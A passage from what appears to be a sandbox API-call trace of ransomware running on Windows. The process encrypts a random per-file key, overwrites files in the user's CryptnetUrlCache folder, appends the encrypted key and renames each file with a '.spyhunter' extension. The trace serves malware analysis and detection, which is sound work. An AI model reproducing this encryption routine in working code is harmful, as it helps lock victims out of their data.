lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0152.840] GetProcessHeap () returned 0x2c0000 [0152.840] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fe0800 | out: hHeap=0x2c0000) returned 1 [0152.840] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270ec50 | out: pbBuffer=0x270ec50) returned 1 [0152.840] GetProcessHeap () returned 0x2c0000 [0152.840] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0152.840] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x270ec48*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x270ec48*=0x30) returned 1 [0152.840] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7396C420A8E1BC1DA97F1AF0D10BAD21" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\7396c420a8e1bc1da97f1af0d10bad21"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0152.840] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7396C420A8E1BC1DA97F1AF0D10BAD21") returned 118 [0152.840] StrStrW (lpFirst="7396C420A8E1BC1DA97F1AF0D10BAD21", lpSrch=".txt") returned 0x0 [0152.840] GetProcessHeap () returned 0x2c0000 [0152.840] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0152.841] ReadFile (in: hFile=0xa0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270ec0c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x270ec0c*=0x22a, lpOverlapped=0x0) returned 1 [0152.841] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xfffffdd6, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0152.841] WriteFile (in: hFile=0xa0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x22a, lpNumberOfBytesWritten=0x270ec0c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x270ec0c*=0x22a, lpOverlapped=0x0) returned 1 [0152.841] GetProcessHeap () returned 0x2c0000 [0152.842] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0152.842] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0152.842] WriteFile (in: hFile=0xa0, lpBuffer=0x270ec4c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270ec0c, lpOverlapped=0x0 | out: lpBuffer=0x270ec4c*, lpNumberOfBytesWritten=0x270ec0c*=0x4, lpOverlapped=0x0) returned 1 [0152.842] WriteFile (in: hFile=0xa0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270ec0c, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x270ec0c*=0x30, lpOverlapped=0x0) returned 1 [0152.842] CloseHandle (hObject=0xa0) returned 1 [0152.842] GetProcessHeap () returned 0x2c0000 [0152.842] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0152.842] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7396C420A8E1BC1DA97F1AF0D10BAD21.spyhunter") returned 128 [0152.842] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7396C420A8E1BC1DA97F1AF0D10BAD21" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\7396c420a8e1bc1da97f1af0d10bad21"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7396C420A8E1BC1DA97F1AF0D10BAD21.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\7396c420a8e1bc1da97f1af0d10bad21.spyhunter")) returned 1 [0152.843] GetProcessHeap () returned 0x2c0000 [0152.843] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0152.843] GetProcessHeap () returned 0x2c0000 [0152.843] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0152.843] GetProcessHeap () returned 0x2c0000 [0152.843] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fc32d8 | out: hHeap=0x2c0000) returned 1 [0152.843] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270ec48 | out: pbBuffer=0x270ec48) returned 1 [0152.843] GetProcessHeap () returned 0x2c0000 [0152.843] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0152.843] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x270ec40*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x270ec40*=0x30) returned 1 [0152.843] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\705A76DE71EA2CAEBB8F0907449CE086_9752C5B2D53EE7A19F7764B52968EC21" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\705a76de71ea2caebb8f0907449ce086_9752c5b2d53ee7a19f7764b52968ec21"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0152.844] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\705A76DE71EA2CAEBB8F0907449CE086_9752C5B2D53EE7A19F7764B52968EC21") returned 151 [0152.844] StrStrW (lpFirst="705A76DE71EA2CAEBB8F0907449CE086_9752C5B2D53EE7A19F7764B52968EC21", lpSrch=".txt") returned 0x0 [0152.844] GetProcessHeap () returned 0x2c0000 [0152.844] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0152.844] ReadFile (in: hFile=0xa0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270ec04, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x270ec04*=0x648, lpOverlapped=0x0) returned 1 [0152.886] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xfffff9b8, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0152.886] WriteFile (in: hFile=0xa0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x648, lpNumberOfBytesWritten=0x270ec04, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x270ec04*=0x648, lpOverlapped=0x0) returned 1 [0152.886] GetProcessHeap () returned 0x2c0000 [0152.887] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0152.887] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0152.887] WriteFile (in: hFile=0xa0, lpBuffer=0x270ec44*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270ec04, lpOverlapped=0x0 | out: lpBuffer=0x270ec44*, lpNumberOfBytesWritten=0x270ec04*=0x4, lpOverlapped=0x0) returned 1 [0152.887] WriteFile (in: hFile=0xa0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270ec04, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x270ec04*=0x30, lpOverlapped=0x0) returned 1 [0152.887] CloseHandle (hObject=0xa0) returned 1 [0152.887] GetProcessHeap () returned 0x2c0000 [0152.887] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0152.887] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\705A76DE71EA2CAEBB8F0907449CE086_9752C5B2D53EE7A19F7764B52968EC21.spyhunter") returned 161 [0152.887] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\705A76DE71EA2CAEBB8F0907449CE086_9752C5B2D53EE7A19F7764B52968EC21" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\705a76de71ea2caebb8f0907449ce086_9752c5b2d53ee7a19f7764b52968ec21"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\705A76DE71EA2CAEBB8F0907449CE086_9752C5B2D53EE7A19F7764B52968EC21.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\705a76de71ea2caebb8f0907449ce086_9752c5b2d53ee7a19f7764b52968ec21.spyhunter")) returned 1 [0152.888] GetProcessHeap () returned 0x2c0000 [0152.888] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0152.888] GetProcessHeap () returned 0x2c0000 [0152.888] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0152.888] GetProcessHeap () returned 0x2c0000 [0152.888] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fe0688 | out: hHeap=0x2c0000) returned 1 [0152.888] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270ec48 | out: pbBuffer=0x270ec48) returned 1 [0152.888] GetProcessHeap () returned 0x2c0000 [0152.888] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0152.888] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x270ec40*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x270ec40*=0x30) returned 1 [0152.888] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\4C8F841FB02DEC8C10108028DB86A08D_8DAFFFD2D43BDC7A1717F5B61C303398" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\4c8f841fb02dec8c10108028db86a08d_8dafffd2d43bdc7a1717f5b61c303398"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0152.889] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\4C8F841FB02DEC8C10108028DB86A08D_8DAFFFD2D43BDC7A1717F5B61C303398") returned 151 [0152.889] StrStrW (lpFirst="4C8F841FB02DEC8C10108028DB86A08D_8DAFFFD2D43BDC7A1717F5B61C303398", lpSrch=".txt") returned 0x0 [0152.889] GetProcessHeap () returned 0x2c0000 [0152.889] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0152.889] ReadFile (in: hFile=0xa0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270ec04, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x270ec04*=0x1d7, lpOverlapped=0x0) returned 1 [0152.890] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xfffffe29, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0152.890] WriteFile (in: hFile=0xa0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x1d7, lpNumberOfBytesWritten=0x270ec04, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x270ec04*=0x1d7, lpOverlapped=0x0) returned 1 [0152.890] GetProcessHeap () returned 0x2c0000 [0152.890] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0152.890] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0152.890] WriteFile (in: hFile=0xa0, lpBuffer=0x270ec44*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270ec04, lpOverlapped=0x0 | out: lpBuffer=0x270ec44*, lpNumberOfBytesWritten=0x270ec04*=0x4, lpOverlapped=0x0) returned 1 [0152.890] WriteFile (in: hFile=0xa0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270ec04, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x270ec04*=0x30, lpOverlapped=0x0) returned 1 [0152.891] CloseHandle (hObject=0xa0) returned 1 [0152.891] GetProcessHeap () returned 0x2c0000 [0152.891] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0152.891] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\4C8F841FB02DEC8C10108028DB86A08D_8DAFFFD2D43BDC7A1717F5B61C303398.spyhunter") returned 161 [0152.891] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\4C8F841FB02DEC8C10108028DB86A08D_8DAFFFD2D43BDC7A1717F5B61C303398" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\4c8f841fb02dec8c10108028db86a08d_8dafffd2d43bdc7a1717f5b61c303398"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\4C8F841FB02DEC8C10108028DB86A08D_8DAFFFD2D43BDC7A1717F5B61C303398.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\4c8f841fb02dec8c10108028db86a08d_8dafffd2d43bdc7a1717f5b61c303398.spyhunter")) returned 1 [0152.892] GetProcessHeap () returned 0x2c0000 [0152.892] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0152.892] GetProcessHeap () returned 0x2c0000 [0152.892] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0152.892] GetProcessHeap () returned 0x2c0000 [0152.892] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e179a0 | out: hHeap=0x2c0000) returned 1 [0152.892] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270ec40 | out: pbBuffer=0x270ec40) returned 1 [0152.892] GetProcessHeap () returned 0x2c0000 [0152.892] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0152.892] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x270ec38*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x270ec38*=0x30) returned 1 [0152.893] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\40E450F7CE13419A2CCC2A5445035A0A_06F02B1F13AB4B11B8FC669BDE565AF1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\40e450f7ce13419a2ccc2a5445035a0a_06f02b1f13ab4b11b8fc669bde565af1"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0152.893] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\40E450F7CE13419A2CCC2A5445035A0A_06F02B1F13AB4B11B8FC669BDE565AF1") returned 151 [0152.893] StrStrW (lpFirst="40E450F7CE13419A2CCC2A5445035A0A_06F02B1F13AB4B11B8FC669BDE565AF1", lpSrch=".txt") returned 0x0 [0152.893] GetProcessHeap () returned 0x2c0000 [0152.893] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0152.893] ReadFile (in: hFile=0xa0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270ebfc, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x270ebfc*=0xb68, lpOverlapped=0x0) returned 1 [0152.895] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xfffff498, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0152.895] WriteFile (in: hFile=0xa0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0xb68, lpNumberOfBytesWritten=0x270ebfc, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x270ebfc*=0xb68, lpOverlapped=0x0) returned 1 [0152.895] GetProcessHeap () returned 0x2c0000 [0152.895] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0152.895] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0152.895] WriteFile (in: hFile=0xa0, lpBuffer=0x270ec3c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270ebfc, lpOverlapped=0x0 | out: lpBuffer=0x270ec3c*, lpNumberOfBytesWritten=0x270ebfc*=0x4, lpOverlapped=0x0) returned 1 [0152.895] WriteFile (in: hFile=0xa0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270ebfc, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x270ebfc*=0x30, lpOverlapped=0x0) returned 1 [0152.896] CloseHandle (hObject=0xa0) returned 1 [0152.896] GetProcessHeap () returned 0x2c0000 [0152.896] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0152.896] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\40E450F7CE13419A2CCC2A5445035A0A_06F02B1F13AB4B11B8FC669BDE565AF1.spyhunter") returned 161 [0152.896] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\40E450F7CE13419A2CCC2A5445035A0A_06F02B1F13AB4B11B8FC669BDE565AF1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\40e450f7ce13419a2ccc2a5445035a0a_06f02b1f13ab4b11b8fc669bde565af1"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\40E450F7CE13419A2CCC2A5445035A0A_06F02B1F13AB4B11B8FC669BDE565AF1.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\40e450f7ce13419a2ccc2a5445035a0a_06f02b1f13ab4b11b8fc669bde565af1.spyhunter")) returned 1 [0152.897] GetProcessHeap () returned 0x2c0000 [0152.897] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0152.897] GetProcessHeap () returned 0x2c0000 [0152.897] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0152.897] GetProcessHeap () returned 0x2c0000 [0152.897] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e17828 | out: hHeap=0x2c0000) returned 1 [0152.897] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270ec40 | out: pbBuffer=0x270ec40) returned 1 [0152.897] GetProcessHeap () returned 0x2c0000 [0152.897] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0152.897] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x270ec38*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x270ec38*=0x30) returned 1 [0152.897] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\3388ECC3F7BC4A9271C10ED8621E5A65_F55C512047947B70F94DE5DEC6D6838D" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\3388ecc3f7bc4a9271c10ed8621e5a65_f55c512047947b70f94de5dec6d6838d"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0152.898] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\3388ECC3F7BC4A9271C10ED8621E5A65_F55C512047947B70F94DE5DEC6D6838D") returned 151 [0152.898] StrStrW (lpFirst="3388ECC3F7BC4A9271C10ED8621E5A65_F55C512047947B70F94DE5DEC6D6838D", lpSrch=".txt") returned 0x0 [0152.898] GetProcessHeap () returned 0x2c0000 [0152.898] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0152.898] ReadFile (in: hFile=0xa0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270ebfc, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x270ebfc*=0x58b, lpOverlapped=0x0) returned 1 [0152.899] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xfffffa75, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0152.899] WriteFile (in: hFile=0xa0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x58b, lpNumberOfBytesWritten=0x270ebfc, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x270ebfc*=0x58b, lpOverlapped=0x0) returned 1 [0152.899] GetProcessHeap () returned 0x2c0000 [0152.899] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0152.899] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0152.900] WriteFile (in: hFile=0xa0, lpBuffer=0x270ec3c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270ebfc, lpOverlapped=0x0 | out: lpBuffer=0x270ec3c*, lpNumberOfBytesWritten=0x270ebfc*=0x4, lpOverlapped=0x0) returned 1 [0152.900] WriteFile (in: hFile=0xa0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270ebfc, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x270ebfc*=0x30, lpOverlapped=0x0) returned 1 [0152.900] CloseHandle (hObject=0xa0) returned 1 [0152.900] GetProcessHeap () returned 0x2c0000 [0152.900] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0152.900] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\3388ECC3F7BC4A9271C10ED8621E5A65_F55C512047947B70F94DE5DEC6D6838D.spyhunter") returned 161 [0152.900] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\3388ECC3F7BC4A9271C10ED8621E5A65_F55C512047947B70F94DE5DEC6D6838D" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\3388ecc3f7bc4a9271c10ed8621e5a65_f55c512047947b70f94de5dec6d6838d"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\3388ECC3F7BC4A9271C10ED8621E5A65_F55C512047947B70F94DE5DEC6D6838D.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\3388ecc3f7bc4a9271c10ed8621e5a65_f55c512047947b70f94de5dec6d6838d.spyhunter")) returned 1 [0152.901] GetProcessHeap () returned 0x2c0000 [0152.901] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0152.901] GetProcessHeap () returned 0x2c0000 [0152.901] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0152.901] GetProcessHeap () returned 0x2c0000 [0152.901] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e176b0 | out: hHeap=0x2c0000) returned 1 [0152.901] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270ec38 | out: pbBuffer=0x270ec38) returned 1 [0152.901] GetProcessHeap () returned 0x2c0000 [0152.901] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0152.901] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x270ec30*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x270ec30*=0x30) returned 1 [0152.901] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\3130B1871A126520A8C47861EFE3ED4D" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\3130b1871a126520a8c47861efe3ed4d"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0152.902] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS 